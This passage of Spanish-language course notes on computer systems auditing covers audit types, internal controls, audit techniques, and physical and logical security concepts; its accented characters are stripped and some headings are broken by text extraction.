AUDITORA DE SISTEMAS COMPUTACIONALES
La auditora de sistemas computacionales est clasificada como una disciplina.
De las ciencias exactas de la economa y administracin
Auditoria Informtica en Sistemas Computacionales La auditora informtica es el proceso de:
Recoger,
Agrupar
Evaluar Evidencias para determinar si un sistema de informacin salvaguarda :
El activo empresarial.
Mantiene la integridad de los datos.
Lleva a cabo eficazmente los fines de la organizacin.
Utiliza eficientemente los recursos.
Cumple con las leyes y regulaciones establecidas.
Orgenes de la Auditora
Se remontan a: Revisin y Diagnostico de registros de las operaciones contables de una empresa. Posteriormente Pasamos al: Anlisis
Verificacin
Evaluacin De los aspectos financieros. Posteriormente se amplio el campo de accin a: Examinar rubros de administracin.
Revisin Integral
Luego se evoluciono a: Anlisis de aspectos que intervienen en todas las actividades.
Por ltimo: Se llevo a lo que se conoce como revisin integral de la organizacin
Nacimiento de las Auditoras Computacionales
Se comenz a realizar inspecciones en reas especializadas o especificas y entre todas los departamentos por clasificarlos de alguna forma y fue como se llego a la :
AUDITORIA DE SISTEMAS COMPUTACIONALES
ANTECEDENTES DE LA AUDITORA - Comercio primitivo
- Comercio por trueque
- Trueque a nivel de aldea
- Comercio a nivel ciudad
- Comercio a nivel estado
- Comercio a nivel continente
- Mecanismos rudimentarios de registros
- Se da inicio a los gremios
- Mercados locales
- Comienzan las empresas incipientes
- Los escribas toman el control
- Aparece la partida doble libro diario
- Surge la llamada: tenedura de libros
- Esta tcnica evoluciono y llego a llamarse: contabilidad cuyo objetivo es: veracidad y
confiabilidad en los datos
- Actualmente la contabilidad se maneja por medios informticos
- En este momento nace la necesidad de que alguien evalu estos controles
La Auditora de Sistemas Computacionales
Se apoya en ellas para ejecutar sus revisiones.
Utilizando sus tcnicas y metodologas de evaluacin.
CONCEPTOS BSICOS SOBRE LA AUDITORA Definicin de Auditora: Revisin independiente de alguna actividad, funciones especificas, resultados u operaciones
administrativas, realizadas por un profesional, con el propsito de evaluar su correcta realizacin
Y, con base en ese anlisis poder emitir una opinin autorizada sobre las razones de sus
resultados.
Auditor
Persona capacitada para realizar auditoras en una empresa u otras instituciones. Es la persona que se encarga de revisar los registros, procedimientos y transacciones financieras de una organizacin hechas por especialistas.
Auditora
LA ACCIN - Supervisin de las cuentas de una empresa, hecha por decisin de un tribunal o
instancia en particular.
CLASIFICACIN DE LOS TIPOS DE AUDITORA
Auditoras por su lugar de Aplicacin
Auditora Externa Auditor no tiene
relacin directa con la empresa
Auditora Interna Existe alguna relacin
del auditor con la empresa
Auditoras por su rea de Aplicacin
Auditora Financiera
Auditora Administrativa
Auditora Operacional
Auditora Integral
Auditora Gubernamental
Auditora de Sistemas
AUDITORAS ESPECIALIZADAS EN REAS ESPECFICAS
Au
dit
or
a p
or
su
rea
de
Ap
licac
in
Auditora rea mdica
Auditora de obras construcciones
Auditora Fiscal
Auditora Laboral
Auditora Proyectos de Inversin
Auditora caja chica o mayor
Auditora inventarios
Auditora ambiental
Auditora de sistemas
Auditora de sistemas computacionales
Auditora Informtica
Auditora con la computadora
Auditora sin la computadora
Auditora a la Gestin Informtica
Auditora al Sistema de Cmputo
Auditora alrededor de la computadora
Auditora de la seguridad de sistemas computacionales
Auditora a los sistemas de redes
Auditora Integral a los centros de cmputo
Auditora ISO-9000 a los sistemas computacionales
Auditora Outsourcing
Auditora ergonmica de sistemas computaciones
AUDITORIA EXTERNA
AU
DIT
OR
IA E
XTE
RN
APrincipal caracterstica es
que la realizan ajenos totalmente a la empresa.
Permite: Utilizar libre albedrio para;
Aplicar mtodos tcnicas y herramientas. Para evaluar las
actividades
El resultado ser absolutamente independiente.
Ventajas
El trabajo es totalmente independiente.
Libre de injerencias de parte de las autoridades de la empresa auditada.
Por ser empresas especializadas cuenta con personal con mucha experiencia
La razn: Es que ya utilizaron tcnicas y herramientas con otras empresas con
caractersticas similares.
Otra es que su dictamen es validado por autoridades
Desventajas
La mayor es que el auditor conoce poco empresa.
Depende de los empleados auditados para realizar su trabajo.
Su evaluacin, alcances pueden ser limitados.
El ambiente es hostil hacia el auditor.
El costo para el empresa es oneroso.
AU
DIT
OR
IA IN
TER
NA
Principal caracterstica
El auditor labora en la misma empresa
Esto le permite estar involucrado en las operaciones
Por su acercamiento a las autoridades de la empresa su juicio de valor podra verse
afectado
Ventajas
Conoce integralmente las actividades operaciones reas.
Revisa con mayor profundidad y conocimiento de las actividades y
problemas de la empresa.
Su informe es interno y es enviado a los superiores nunca sale de las oficinas.
Al ser parte de la empresa no se consumen honorarios adicionales
La ms importante es que detectar problemas y desviaciones a tiempo
Desventajas
Las autoridades pueden influir en sus informes(injerencia)
Puede experimentar presiones, compromisos, y hasta ciertos intereses de
algunos pocos.
CLASIFICACIN DE AUDITORAS POR SU REA DE APLICACIN Se refiere al mbito especfico donde se llevan a cabo las actividades y operaciones que sern
auditadas, de acuerdo al rea de trabajo e influencia de la rama o especialidad que ser evaluada
Au
dit
or
a Fi
nan
cier
a Primer tipo de auditora que existi en el mbito comercial.Este tipo de auditora es la principal actividad del auditor, consiste en
revisar que se haya aplicado los registros contables de forma oportuna y correcta.
Revisin sistemtica , explorativa y critica. Realizada por un profesional a los sistemas contables. Con el fin de evaluar la razonabilidad, veracidad,
confiabilidad, y oportunidad en la emisin de los resultados financieros.
Au
dit
or
a A
dm
inis
trat
iva
Revisin sistemtica y exhaustiva que se realiza en las actividades
administrativas. En cuanto a:
Relacin entre integrantes.
Cumplimiento de Funciones
Actividades que regulan sus operaciones
Au
dit
or
a O
per
acio
nal
Revisin sistemtica, exhaustiva y especfica de las actividades de una empresa. Evala:
Existencia
Suficiencia
Eficacia
Eficiencia
Correcto desarrollo de operaciones
Au
dit
or
a In
tegr
al
Revisin exhaustiva, sistemtica y global
que realiza un equipo multidisciplinario de profesionales a todas
las actividades y operaciones de la
empresa para evaluar:
Funciones Administrativas
Resultados Conjuntos
Relaciones de Trabajo
Comunicaciones y Procedimientos
Normas Polticas y Lineamientos sobre los recursos de la empresa.
El propsito fundamental de este tipo de auditora tan
especializada es Auditar de manera conjunta todas las:
Actividades
Funciones
Operaciones de todas las reas de la empresa
Au
dit
or
a G
ub
ern
amen
tal Es la revisin exhaustiva,
sistemtica y concreta que se realiza a todas las actividades y
operaciones de un ente gubernamental. Evala:
Correcto desarrollo de funciones en todas las reas administrativas
Mtodos y procedimientos.
Cual es la razn de ser de esta auditora si ya exista la auditora
integral.
Alcanzar los objetivos de gobierno.
Haya un aplicacin y cumplimiento del presupuesto pblico
La integral evoluciono suficientemente para esta acccin.
Au
dit
or
a In
form
tic
a
Revisin tcnica, especializada y exhaustiva que se realiza a :
Sistemas computacionales
Software
Datos de la empresa
Instalaciones
Telecomunicaciones
Redes
Mobiliario
Equipos perifricos
Y dems componentes.
Esta revisin tambin aplica a la:
Gestin informtica.
Aprovechamiento de recursos.
Medidas de seguridad
Bienes consumo o suministros
Propsito Fundamental Auditora Informtica
Evaluar:
Uso adecuado de los sistemas para:
Correcto ingreso de datos.
Procesamiento adecuado de la informacin.
Emisin oportuna de reportes.
Cumplimiento de funciones
Actividades y operaciones de empleados
involucrados en los sistemas computacionales.
Los avances tecnolgicos son cada vez ms
singulares y peculiares por lo que no es suficiente:
Mtodos
Tcnicas
Herramientas
Procedimientos
Auditora Informtica
Revisin tcnica, especializada y exhaustiva que se realiza a:
Sistemas computacionales
Software
Informacin de la empresa
Dicho de forma general y similar a nuestro anterior concepto y de momento
mientras abordamos todas las dems.
Auditora con la
computadora
Es la auditora que se realiza con el apoyo de los equipos de cmputo y sus programas para
evaluar cualquier tipo de actividades y operaciones, no necesariamente
computarizadas, pero s susceptibles de ser automatizadas.
Auditora sin la
computadora
Es la auditoria cuyos mtodos, tcnicas y procedimientos estn
orientados nicamente a la evaluacin tradicional del
comportamiento y validez de las transacciones econmicas,
administrativas y operacionales de un rea de cmputo.
Evala:
Estructura de la organizacin
Funciones y actividades de funcionarios
Personal del centro de cmputo
Perfil de los puestos
Reporte, informes, bitcoras de los sistemas
Existencia de programas, planes presupuestos en centro cmputo
Uso y aprovechamiento de los recursos.
Seguridad y prevencin
Contingencias
Procedimientos para adquirir nuevo hardware y software
Contratacin de nuevo personal
Auditora a la Gestin Informtica
Se toma de carcter administrativa y
operacional. Auditora cuya aplicacin esta
enfocada a:
Planeacin
Direccin
Control de un Centro
Tambin se utiliza para:
Evaluar el cumplimiento de las funciones y
actividades del funcionario empleados
usuarios del rea de sistemas
Revisa y evala:
Operaciones del sistema
Uso y proteccin de los sistemas de
procesamiento
Programas e informacin
Mantenimiento y explotacin de los
sistemas equipos e instalaciones
Auditora en Sistemas Computacionales
Auditoria ms especializada y
concreta.
Enfocada a la actividad y operacin de los
sistemas computacionales.
Aqu se utiliza ms:Evaluacin tcnica y
especializada.
Evala:
Funcionamiento y uso correcto del equipo de
computo.
Hardware
Software y perifricos asociados
Arquitectura fsica y componentes de
hardware
Desarrollo y uso de software de operacin.
Lenguajes de desarrollo.
Por ultimo incluye la operacin del sistema
Auditora alrededor de la computadora
Es la revisin especfica que se realiza a todo lo que est alrededor de un equipo de
cmputo, como son
sus sistemas
actividades funcionamientoshaciendo una evaluacin
de sus mtodos y procedimientos.
Auditora de la seguridad de los sistemas
computacionales
Seguridad es uno de los aspectos ms importantes
en los sistemas computacionales-
Revisin exhaustiva, tcnica y especializada a la
seguridad de un sistema a:.
reas y el personal.
Actividades de los funcionarios
Acciones preventivas y Correctivas que se tengan.
PLANES DE CONTINGENCIA.
Medidas de proteccin de la informacin
Au
dit
or
a a
los
Sist
emas
de
Red
es
Revisin exhaustiva, especfica y
especializada que se realiza a los sistemas computacionales de
redes de una empresa.
Revisa
Arquitectura
Topologa
Protocolos de Comunicacin
Conexiones
Accesos
Privilegios
Administracin
Instalacin
Funcionalidad
Aprovechamiento
Revisin del software institucional
Recursos informticos
Informacin de las operaciones
Bases de datos compartidas
Software y Hardware de la red
Au
dit
or
a In
tegr
al a
los
cen
tro
s d
e c
mp
uto Es la revisin
exhaustiva, sistemtica y global que se realiza por
medio de un equipo
multidisciplinario de auditores, de
todas las actividades y
operaciones de un centro
sistematizacin.
Se Evalua
Uso adecuado de los sistemas de cmputo.
Equipos Perifricos.
Apoyo para el procesamiento de informacin de la empresa.
Red de servicio de la empresa
Desarrollo correcto de las funciones de sus reas, personal y usuarios.
Administracin del sistema.
Manejo y control de sistemas operativos.
Lenguajes.
Programas.
Software de aplicacin.
Administracin y control de proyectos
Adquisicin de hardware y software
Administracin y control de proyectos.
Integracin y uso de los recursos informticos.
Existencia y cumplimiento de
las normas
polticas
estndares
procedimientos del sistema
personal
usuarios del centro de cmputo.
Auditora ISO-9000 a los Sistemas
Computacionales
Revisin exhaustiva, sistemtica y
especializada que realizan nicamente
los auditores especializados y
certificados en las normas y
procedimientos ISO-9000
El propsito fundamental de esta
revisin es:
Evaluar
Dictaminar
Certificar
Que la calidad de los sistemas
computacionales se apegue a los
requerimientos del ISO-9000
Au
dit
or
a O
uts
ou
rcin
g
Revisin exhaustiva, sistemtica y
especializada que se realiza para evaluar la
calidad en el servicio de asesora o
procesamiento externo de informacin que
proporciona una empresa.
Objetivo
Revisar confiabilidad.
Oportunidad.
Suficiencia.
Asesora de los prestadores del servicio.
Cumplimiento de las funciones y actividades.
Auditora Ergonmica de Sistemas
Computacionales
Es la revisin tcnica, especfica y
especializada que se realiza para evaluar :
Calidad
Eficiencia
Utilidad del entorno hombre-maquina-medio
ambiente.
evalua
Correcta adquisicin y uso de mobiliario y equipo y
sistemas.
Bienestar confort comodidad que necesita un
usuario.
Deteccin de problemas y repercusiones con la salud
fsica y bienestar del usuario.
Objetivos
Realizar una revisin independiente
Hacer una revisin especializada
Evaluar el cumplimiento de planes
Evaluar el cumplimiento de planes
SIMILITUDES Y DIFERENCIAS EN LA AUDITORIA INTERNA Y EXTERNA
CONTROL INTERNO INFORMTICO AUDITOR INFORMTICO
SIMILITUDES PERSONAL INTERNO
Conocimientos especializados en tecnologas de informacin verificacin
del cumplimiento de controles internos, normativa y procedimientos
establecidos por la direccin informtica y la direccin general para los
sistemas de informacin.
DIFERENCIAS Anlisis de los controles en el da a da.
Informa a la direccin del
departamento de informtica.
Slo personal interno.
El enlace de sus funciones es
nicamente sobre el departamento de
informtica.
Anlisis de un momento
informtico determinado. Informa
a la direccin general de la
organizacin.
Personal interno y/o externo.
Tiene cobertura sobre todos los
componentes de los sistemas de
informacin de la organizacin.
Elementos fundamentales del control interno informtico CONTROLES INTERNOS SOBRE LA ORGANIZACIN DEL REA DE INFORMTICA
- Direccin
- Divisin del trabajo
- Asignacin de responsabilidad y autoridad
- Establecimiento de estndares y Mtodos
- Perfiles de puestos
CONTROLES INTERNOS SOBRE EL ANLISIS, DESARROLLO E IMPELEMENTACIN DE SISTEMAS
- Estandarizacin de metodologas para el desarrollo de proyectos
- Elaborar estudios de factibilidad del sistema
- Garantiza la eficiencia y eficacia en el anlisis y diseo de sistemas
- Vigilar la efectividad y eficiencia en la implementacin y mantenimiento del sistema
- Optimizar el uso del sistema por medio de su documentacin
CONTROLES INTERNOS SOBRE LA OPERACIN DEL SISTEMA
- Prevenir y corregir los errores de operacin
- Prevenir y evitar la manipulacin fraudulenta de la informacin
- Implementar y mantener la seguridad en la operacin
- Mantener la confiabilidad, oportunidad, veracidad y suficiencia en el procesamiento de la
informacin
CONTROLES INTERNOS SOBRE LOS PROCEDIMIENTOS DE ENTRADA DE DATOS, EL
PROCESAMIENTO DE INFORMACIN Y LA EMISIN DE RESULTADOS
- Verificar existencia de procedimientos de captura de datos
- Comprobar que todos los datos sean procesados
- Verificar confiabilidad, veracidad y exactitud en el procesamiento de datos
- Comprobar la oportunidad, confiabilidad y veracidad en la emisin de reportes del
procesamiento de informacin
CONTROLES INTERNOS SOBRE LA SEGURIDAD DEL AREA DE SISTEMAS
- Controles para prevenir y evitar amenazas, riesgos y contingencias que puedan incidir en los
sistemas.
- Controles sobre la seguridad fsica del rea de sistemas
- Controles sobre la seguridad lgica de los sistemas
- Controles sobre la seguridad de las bases de datos
- Controles sobre la seguridad de los sistemas computacionales
- Controles sobre la seguridad del personal de informtica
- Controles sobre la seguridad de las telecomunicaciones de informtica
- Controles sobre la seguridad de las redes
LAS SIETE FASES DE SDLC - Identificacin de problemas, oportunidades y objetivos
- Determinacin de los requerimientos de informacin
- Anlisis de necesidades de sistema
- Diseo del sistema recomendado
- Desarrollo y documentacin del software
- Pruebas y mantenimiento del software
- Implementacin y evaluacin del sistema
AUDITORA INFORMTICA - Regular Informtica:
o Se refiere a la calidad de la informacin existente en las bases de datos de los
sistemas informticos que se utilizan para controlar los recursos, su entorno y los
riesgos asociados a esta actividad.
- Especial Informtica:
o El anlisis de los aspectos especficos relativos a las bases de datos de los sistemas
informticos en que se haya detectado algn tipo de alteracin o incorrecta
operatoria de los mismos.
- Recurrente Informtica:
o Se examina los Planes de Medidas elaborados en auditoras informticas anteriores
donde se obtuvo la calificacin de Deficiente o Malo, ya sea en una Regular o
Especial.
Auditora Informtica
Es una disciplina incluida en el campo de la auditora y es el anlisis de las condiciones de una
instalacin informtica por un auditor externo e independiente que realiza un dictamen sobre
diferentes aspectos.
Auditora Informtica se puede definir como el conjunto de procedimientos y tcnicas para
evaluar y controlar un sistema informtico con el fin de constatar si sus actividades son correctas
y de acuerdo a las normativas informticas y generales en la empresa.
La Auditora Informtica a ms de la evaluacin de los computadores, de un sistema o
procedimiento especfico, habr de evaluar los sistemas de informacin en general desde sus
entradas, procedimientos, controles, obtencin de informacin, archivos y seguridad. Siendo de
vital importancia para el buen desempeo de los sistemas de informacin, ya que proporciona los
controles necesarios para que los sistemas sean confiables y con un buen nivel de seguridad.
Adems debe evaluar todo: Informtica, organizacin de centros de informacin, hardware y
software, el auditor informtico ha de velar por la correcta utilizacin de los amplios recursos que
la empresa pone en juego para disponer de un eficiente y eficaz sistema de Informacin.
Las fases ms importantes en el desarrollo de la auditora informtica son las siguientes:
- Toma de Contacto
- Validacin de la Informacin
- Desarrollo de la Auditora
- Fase de Diagnstico
- Presentacin de Conclusiones
- Formacin del Plan de Mejoras (Recomendaciones).
Tcnicas o herramientas usadas por la Auditora Informtica
Cuestionarios
La informacin recopilada es muy importante, y esto se consigue con el levantamiento de
informacin y documentacin de todo tipo. Los resultados que arroje una auditora se ven
reflejados en los informes finales que estos emitan y su capacidad para el anlisis de situaciones
de debilidades o de fortalezas que se dan en los diversos ambientes. El denominado trabajo de
campo consiste en que el auditor busca por medio de cuestionarios recabar informacin
necesaria para ser discernida y emitir finalmente un juicio global objetivo, los que deben ser
sustentados por hechos demostrables, a quienes se les llama evidencias.
Esto se puede conseguir, solicitando el cumplimiento del desarrollo de formularios o cuestionarios
lo que son preimpresos, los cuales son dirigidas a las personas que el auditor considera ms
indicadas, no existe la obligacin de que estas personas sean las responsables de dichas reas a
auditar.
Cada cuestionario es diferente y muy especfico para cada rea, adems deben ser elaborados con
mucho cuidado tomando en cuenta el fondo y la forma. De la informacin que ha sido analizada
cuidadosamente, se elaborar otra informacin la cual ser emitida por el propio Auditor. Estas
informaciones sern cruzadas, lo que viene a ser uno de los pilares de la auditora.
Muchas veces el auditor logra recopilar la informacin por otros medios, y que estos preimpresos
podan haber proporcionado, cuando se da este caso, se puede omitir esta primera fase de la
auditora
Entrevistas
Tres formas existentes hacen que el auditor logre relacionarse con el personal auditado.
- La solicitud de la informacin requerida, esta debe ser concreta y debe ser de la materia de
responsabilidad del auditado.
- En la entrevista no se sigue un plan predeterminado ni un mtodo estricto de sometimiento
a un cuestionario.
- La entrevista es un medio por el que el auditor usar metodologas las que han sido
establecidas previamente con la finalidad de encontrar informacin concreta.
La importancia que la entrevista tiene en la auditora se debe a que la informacin que recoge es
mayor, se encuentra mejor elaborada, y es ms concreta que las que pueden proporcionar los
medios tcnicos, o los cuestionarios. La entrevista personal entre el auditor y el personal
auditado, es basada en una serie de preguntas especficas en las que el auditado deber
responder directamente.
Checklist
El uso del Checklist goza de opiniones compartidas, debido a que descalifica en cierta forma al
auditor informtico, ya que al hacer uso de este tipo de cuestionarios el auditor incurre en la falta
de profesionalismo. Por eso es mejor que se de un procesamiento de la informacin a fin de
llegar a respuestas que tengan coherencia y as poder definir correctamente los puntos ms
dbiles y los ms fuertes; el profesionalismo del auditor se refleja en la elaboracin de preguntas
muy bien analizadas, las mismas que se hacen de forma no muy rigurosa.
Estos cuestionarios deben ser contestados oralmente, ya que superan en riqueza a cualquier otra
forma de obtencin de informacin.
El personal auditado generalmente se encuentra familiarizado con el perfil tcnico y lo percibe
fcilmente, as como los conocimientos del auditor. De acuerdo a esta percepcin denota el
respeto y el prestigio que debe poseer el auditor.
Por ello es muy importante tener elaboradas las listas de preguntas, pero an es mucho ms
importante la forma y el orden en que estas se formulan, ya que no serviran de mucho si es que
no se desarrollan oportuna y adecuadamente.
Puede ser que alguna pregunta deba repetirse, pero en este caso deber ser formulada en forma
diferente, o su equivalencia. Con la ayuda de este mtodo los puntos contradictorios sern
notorios de forma ms rpida. Cuando se dan casos en los que existe contradiccin, entonces se
har una reelaboracin de preguntas para complementar a las formuladas previamente y as
poder conseguir consistencia.
Estos Checklist responden a dos tipos de razonamiento para su calificacin o evaluacin:
- Checklist de rango: contendr preguntas que se harn dentro de los parmetros
establecidos, por ejemplo, de 1 a 5, siendo 1 la respuesta ms negativa y 5 la ms positiva.
- Checklist Binario: preguntas que son formuladas con respuesta nica y excluyente, Si o No;
verdadero o falso.
Tipos de Auditoras Informticas
Los objetivos generales de la Auditora Informtica cambian dependiendo de las tareas que tiene
que verificar o controlar, por ejemplo:
- En la Auditora de Sistemas tendr que controlar la interfaz de usuario, la documentacin de
la aplicacin.
- En la Auditora Ofimtica (dentro de la Auditora de Sistemas) tendr que controlar la
instalacin de la aplicacin, el movimiento de la informacin.
- En la Auditora de Redes tendr que controlar la conexin entre los computadores, la
instalacin del software para la red.
- En la Auditora para la Administracin de las Bases de Datos tendr que controlar la
integridad de los datos, la concurrencia a la Base de Datos.
- En la Auditora en Tecnologas Internet tendr que controlar las ventajas de portabilidad de
las aplicaciones del lado del cliente, la accesibilidad desde diferentes dispositivos
(diferentes sistemas operativos, celulares, palm, etc.).
Debido a los diferentes tipos de auditora informtica el auditor debe conocer bien el rea que va
a auditar y slo de esta forma podr realizar un buen trabajo; esto quiere decir que si el Auditor va
a realizar una Auditora de Redes el tendr que ser especialista de Redes o por lo menos conocer
muy bien el manejo y funcionamiento de las redes e incluso entre diferentes Sistemas Operativos
y as con todos los tipos de Auditoras
Seguridad Informtica: La seguridad permite garantizar que los recursos informticos de una compaa estn disponibles
para cumplir sus propsitos, es decir, que no estn daados o alterados por circunstancias o
factores externos, es una definicin til para conocer lo que implica el concepto de seguridad
informtica. Entendindose como peligro o dao todo aquello que pueda afectar su
funcionamiento directo o los resultados que se obtienen del mismo.
La seguridad es un tema muy importante para cualquier empresa, este o no conectada a una red
pblica. Los niveles de seguridad que se pueden implementar son muchos y depender del usuario
hasta donde quiera llegar.
La seguridad informtica y de datos en una empresa dista mucho de simplemente tener un
Firewall. Se aborda un proceso de seguridad recomendado a utilizar por lo menos las siguientes
herramientas:
- Un firewall o combinacin de ellos.
- Proxies.
- Un sistema de deteccin de intrusos o IDS.
- Sistemas de actualizacin automtica de software.
- Sistemas de control de la integridad de los servidores, paquetes, etc.
- Un sistema de administracin y control para monitorear la seguridad.
Segn expertos hasta hoy en da todava no se ha creado un sistema que sea 100% seguro y
explican que un sistema se puede definir como seguro cuando tiene las tres caractersticas
principales como son: Integridad (Autorizacin para que la informacin sea modificada),
Confidencialidad (Informacin asequible para autorizados), Disponibilidad (Disponible solo cuando
se necesite).
En otras palabras la seguridad puede entenderse como aquellas reglas tcnicas o actividades
destinadas a prevenir, proteger y resguardar lo que es considerado como susceptible de robo,
prdida o dao, ya sea de manera personal, grupal o empresarial.
En este sentido, es la informacin el elemento principal a proteger, resguardar y recuperar dentro
de las redes empresariales.
La seguridad informtica de una empresa es primordial debido a la existencia de personas ajenas a
la informacin (hackers), quienes buscan la mnima oportunidad para acceder a la red, modificar,
borrar datos o tomar informacin que puede ser de vital importancia para la empresa.
Tales personajes pueden, incluso, formar parte del personal administrativo o de sistemas, de
cualquier compaa; de acuerdo con expertos en el rea, ms de 70% de las violaciones a los
recursos informticos se realiza por el personal interno, debido a que ste conoce los procesos,
metodologas o tiene acceso a la informacin sensible de la empresa que puede afectar el buen
funcionamiento de la organizacin, pudiendo representar un dao con valor de miles o millones
de dlares.
En el momento de instalar un sistema y haber invertido con mecanismos de seguridad, se debera
plantear la pregunta: cul debe ser el nivel de seguridad de la empresa? La respuesta va a
depender de la importancia que tenga la informacin y los recursos que compongan el sistema. De
tal forma que se necesite asegurar pero no ser lo mismo con un sistema informtico bancario,
que con los que contengan informacin que afecte a la seguridad del estado, o que aquellos
destinados al desarrollo de aplicaciones informticas comerciales, o simples programas para
computadores personales del hogar.
Se debe establecer polticas de seguridad como un factor importante para la empresa, pudiendo
ser el monitoreo de la red, los enlaces de telecomunicaciones, respaldar datos, para establecer los
niveles de proteccin de los recursos.
Es recomendable que las polticas se basen en los siguientes puntos:
- Identificar y seleccionar la informacin sensible (que se debe proteger).
- Establecer niveles de importancia en la informacin.
- Dar a conocer los resultados que traera a la organizacin, si se llegase a perder la
informacin importante. Referente a costos y productividad.
- Identificar los niveles de vulnerabilidad de la red y las amenazas que tiene al tener una red
mal estructurada.
- Realizar un anlisis de los costos para prevenir y recuperar la informacin en el caso de
sufrir un ataque.
- Implementar respuesta a incidentes y recuperacin para disminuir el impacto.
Las polticas detalladas permitirn desplegar un diseo de la seguridad basada en soluciones
tcnicas, as como el desarrollo de un plan de contingencias para manejar los incidentes y
disminuir el impacto que estas causaran.
SEGURIDAD FSICA Es muy importante ser consciente que por ms que la empresa sea la ms segura desde el punto
de vista de ataques externos, Hackers, virus, etc.; la seguridad de la misma ser nula si no se ha
previsto como combatir un incendio o algn tipo de desastre natural.
La seguridad fsica es uno de los aspectos ms olvidados a la hora del diseo de un sistema
informtico. La Seguridad Fsica consiste en la aplicacin de barreras fsicas y procedimientos de
control, como medidas de prevencin y contramedidas ante amenazas a los recursos e
informacin confidencial. Refirindose de esta manera a los controles y mecanismos de seguridad
dentro y alrededor del Centro de Cmputo as como los medios de acceso remoto; implementado
para proteger el hardware y medios de almacenamiento de datos.
TIPOS DE DESASTRES Este tipo de seguridad est enfocado a cubrir las amenazas ocasionadas tanto por el hombre como
por la naturaleza del medio fsico en que se encuentra ubicada la seccin de procesamiento de
datos.
Las principales amenazas que se prevn en la seguridad fsica son:
- Desastres naturales, incendios accidentales tormentas e inundaciones.
- Amenazas ocasionadas por el hombre.
- Disturbios, sabotajes internos y externos deliberados.
A veces basta recurrir al sentido comn para darse cuenta que cerrar una puerta con llave o
cortar la electricidad en ciertas reas siguen siendo tcnicas vlidas en cualquier entorno.
A continuacin se analizan los peligros ms importantes que se corren en un centro de
procesamiento; con el objetivo de mantener una serie de acciones a seguir en forma eficaz y
oportuna para la prevencin, reduccin, recuperacin y correccin de los diferentes tipos de
riesgos.
- Incendios
- Inundaciones
- Condiciones Climatolgicas
- Instalaciones Elctricas
Acciones Hostiles
- Robo
- Fraude
- Sabotaje
SEGURIDAD LGICA Luego de ver como nuestro sistema puede verse afectado por la falta de Seguridad Fsica, es
importante recalcar que la mayora de los daos que puede sufrir un centro de cmputo no ser
sobre los medios fsicos sino contra informacin almacenada y procesada.
El activo ms importante que se posee una empresa es la informacin, y por lo tanto deben existir
tcnicas, ms all de la seguridad fsica, que la aseguren. Estas tcnicas las brinda la Seguridad
Lgica.
Es decir que la Seguridad Lgica consiste en la aplicacin de barreras y procedimientos que
resguarden el acceso a los datos y slo se permita acceder a ellos a las personas autorizadas para
hacerlo.
Los objetivos que plantean este tipo de seguridades son:
- Restringir el acceso a los programas y archivos.
- Asegurar que los operadores puedan trabajar sin una supervisin minuciosa y no puedan
modificar los programas ni los archivos que no correspondan.
- Asegurar que se estn utilizados los datos, archivos y programas correctos.
- Que la informacin transmitida sea recibida slo por el destinatario al cual ha sido enviada y
no a otro.
- Que la informacin recibida sea la misma que ha sido transmitida.
- Que existan sistemas alternativos secundarios de transmisin entre diferentes puntos.
- Que se disponga de pasos alternativos de emergencia para la transmisin de informacin.
CONTROL DE SISTEMAS E INFORMTICA El control de sistemas e informtica consiste en examinar los recursos, las operaciones, los
beneficios y los gastos de las producciones, de los organismos sujetos a control, con la finalidad de
evaluar la eficacia y eficiencia Administrativa, Tcnica y Operacional. Asimismo de los Sistemas
(Planes, Programas y Presupuestos, Diseo, Software, Hardware, Seguridad, Respaldos y otros)
adoptados por la empresa.
Existe otra definicin sobre el "control tcnico" en materia de Sistemas e Informtica, y esta se
orienta a la revisin del Diseo de los Planes, Diseos de los Sistemas, la demostracin de su
eficacia, Pruebas de Productividad de Gestin, el anlisis de resultados, niveles y medios de
seguridad, respaldo, y el almacenamiento.
Los controles pueden ser de dos tipos: control visual que permiten eliminar muchos riesgos de
forma sencilla, y los controles de validez que se basan en estadsticas que indican posibles riesgos
inminentes, de tal forma que se pueda prevenir. Un control es una muestra de acciones
ejecutadas su funcin es establecer, ejecutar, modificar y mantener actividades de control de
modo que la fiabilidad global del sistema sea aceptable.
Se detallan algunos de los controles ms importantes:
1. Controles de autenticidad: Para verificar la identidad de un usuario que quiera tomar
alguna accin en el sistema, como passwords, nmeros de identificacin personal.
2. Controles de precisin: Para asegurar la correccin de la informacin y procesos en el
sistema, como un programa o rutina que controle el tipo de dato ingresado.
3. Controles de completitud: Asegurarse de que no hay prdida de informacin y que todo
proceso se concluya adecuadamente, como revisar que no haya dos campos vacos.
4. Controles de redundancia: Para asegurar que la informacin es procesada una sola vez.
5. Controles de privacidad: Impedir que usuarios no autorizados accedan a informacin
protegida.
6. Controles de auditora: Tratar de asegurar que queden registrados cronolgicamente todos
los eventos que ocurren en el sistema. Este registro es muy importante para responder
preguntas, determinar irregularidades, detectar las consecuencias de un error. Deben
mantenerse dos tipos de auditora, la auditora de cuentas y la auditora de operaciones.
7. Controles de existencia: Asegurar la disponibilidad continua de todos los recursos y datos
del sistema.
8. Controles de salvaguarda de activos: Para asegurar que todos los recursos dentro del
sistema estn protegidos de la destruccin o corrupcin.
9. Controles de eficacia: Asegurar que el sistema alcanza sus objetivos.
10. Controles de eficiencia: Asegurar que el sistema utiliza el mnimo nmero de recursos para
conseguir sus objetivos.
Estos tipos de control no son mutuamente excluyentes. Un control puede participar en varias
categoras.
Al evaluarse los efectos de un control sobre la fiabilidad de un componente, se consideran varios
atributos del control:
- La bsqueda del tipo de control adecuado, dada la naturaleza del proceso de actividades
depende del sistema. Adems algunas veces el controlar algn tipo de error o irregularidad
es mucho ms caro que las prdidas que estos producen.
- Un atributo a considerar cuando se evala la efectividad del control es si el control
previene, detecta o corrige errores.
- Otro atributo a tener en cuenta es el nmero de componentes necesarios para realizar el
control.
- Finalmente han de considerarse el nmero de subsistemas afectados por el control. Esta
funcin comprueba si se trata de un componente compartido, es decir, que realiza
actividades en varios subsistemas.
El auditor se preocupa en conseguir que los sistemas se encuentren en total operatividad, para
lograr esto se deben realizar una serie de Controles Tcnicos Generales de Operatividad, y dentro
de ellos unos Controles Tcnicos Especficos de Operatividad, los que deben estar desarrollados
previamente.
CONTROLES TCNICOS GENERALES Estos controles verifican la compatibilidad entre el Sistema Operativo y el Software de base con
todos los subsistemas existentes, as como la compatibilidad entre el Hardware y el Software
instalado. La importancia de estos controles en las instalaciones se da debido a que como existen
entornos de trabajo muy diferenciados se obliga a contratar diferentes productos de software
bsico, existiendo el riesgo de que se pueda desaprovechar parte del software que ha sido
adquirido. Existe la posibilidad de que cada Centro de Procesamiento de Datos sea operativo
